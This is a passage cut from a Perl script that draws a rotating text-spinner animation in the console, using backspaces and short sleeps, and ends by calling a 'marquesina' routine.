elsif($car eq "/") {
mostrar("\b".$dos.$car,"-");
}
elsif($car eq "-") {
mostrar("\b".$dos.$car,"\\");
} else {
mostrar("\b".$dos.$car,"|");
}
usleep(40_000); 
}
print "\b ";
}

sub mostrar {
print $_[0];
$car = $_[1];
}

}

marquesina(@test);

#The End ?